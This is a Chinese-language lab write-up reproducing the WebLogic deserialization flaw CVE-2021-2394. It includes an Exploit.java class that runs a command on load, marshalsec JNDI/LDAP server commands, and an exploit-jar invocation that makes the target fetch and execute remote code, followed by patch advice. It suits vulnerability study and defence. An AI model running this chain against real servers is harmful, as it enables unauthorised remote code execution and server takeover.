CVE-2021-2394:Weblogic反序列化漏洞复现

admin 2021年8月16日01:00:50评论296 views字数 1691阅读5分38秒阅读模式


上方蓝色字体关注我们,一起学安全!
作者:Xz@Timeline Sec
本文字数:815
阅读时长:2~3min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负


0x01 简介

WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。


0x02 漏洞概述
编号:CVE-2021-2394
Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。

这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。


0x03 影响版本

Oracle WebLogic Server 10.3.6.0.0

Oracle WebLogic Server 12.1.3.0.0

Oracle WebLogic Server 12.2.1.3.0

Oracle WebLogic Server 12.2.1.4.0

Oracle WebLogic Server 14.1.1.0.0


0x04 环境搭建

系统环境:window10系统

weblogic版本:12.2.1.3, 直接官网下载就可以


CVE-2021-2394:Weblogic反序列化漏洞复现


weblogic安装过程省略,很简单

安装好之后,在此目录启动就可以

C:OracleMiddlewareOracle_Homeuser_projectsdomainsbase_domainstartWebLogic.cmd


CVE-2021-2394:Weblogic反序列化漏洞复现


weblogic启动成功的截图


CVE-2021-2394:Weblogic反序列化漏洞复现


0x05 漏洞复现

1、下载marshalsec利用marshalsec开启JNDI服务

https://github.com/mbechler/marshalsec # 需要自己编译mvn clean package –DskipTests
https://github.com/RandomRobbieBF/marshalsec-jar # 可以直接使用


2、创建Exploit.java,通过javac编译得到Exploit.class   

public class Exploit {
static { System.err.println("Pwned"); try { String cmds = "calc"; Runtime.getRuntime().exec(cmds); } catch ( Exception e ) { e.printStackTrace(); } }}


3、在同目录下使用python开启一个http服务,并使用marshalsec开启JNDI服务

python -m http.server 8000java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 8087


CVE-2021-2394:Weblogic反序列化漏洞复现


CVE-2021-2394:Weblogic反序列化漏洞复现


4、利用我们组lz2y大佬写的exp进行复现

https://github.com/lz2y/CVE-2021-2394/releases/tag/2.0


java -jar CVE_2021_2394.jar 192.168.31.3 7001 ldap://192.168.3.35:8087/Exploit


CVE-2021-2394:Weblogic反序列化漏洞复现


目标机成功弹框


CVE-2021-2394:Weblogic反序列化漏洞复现


0x06 修复方式


当前官方已发布受影响版本的对应补丁,建议受影响的用户及时更新官方的安全补丁。链接如下:

https://www.oracle.com/security-alerts/cpuapr2021.html


参考链接:

https://github.com/lz2y/CVE-2021-2394/

https://mp.weixin.qq.com/s/wFHhWvnCLm1xcWZIbv6O3A


CVE-2021-2394:Weblogic反序列化漏洞复现
往期回顾

CVE-2021-2394:Weblogic反序列化漏洞复现
CVE-2021-2394:Weblogic反序列化漏洞复现
CVE-2021-2394:Weblogic反序列化漏洞复现


CVE-2021-2394:Weblogic反序列化漏洞复现

CVE-2021-2394:Weblogic反序列化漏洞复现
阅读原文看更多复现文章
Timeline Sec 团队
安全路上,与你并肩前行





本文始发于微信公众号(Timeline Sec):CVE-2021-2394:Weblogic反序列化漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月16日01:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2021-2394:Weblogic反序列化漏洞复现https://cn-sec.com/archives/460040.html

发表评论

匿名网友 填写信息